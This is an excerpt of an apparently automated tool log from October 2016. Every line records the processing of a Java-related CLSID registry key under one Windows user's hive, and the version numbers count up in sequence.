[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.270] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.271] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.272] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.273] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.274] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.275] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.276] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.277] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.278] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.279] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBA}]
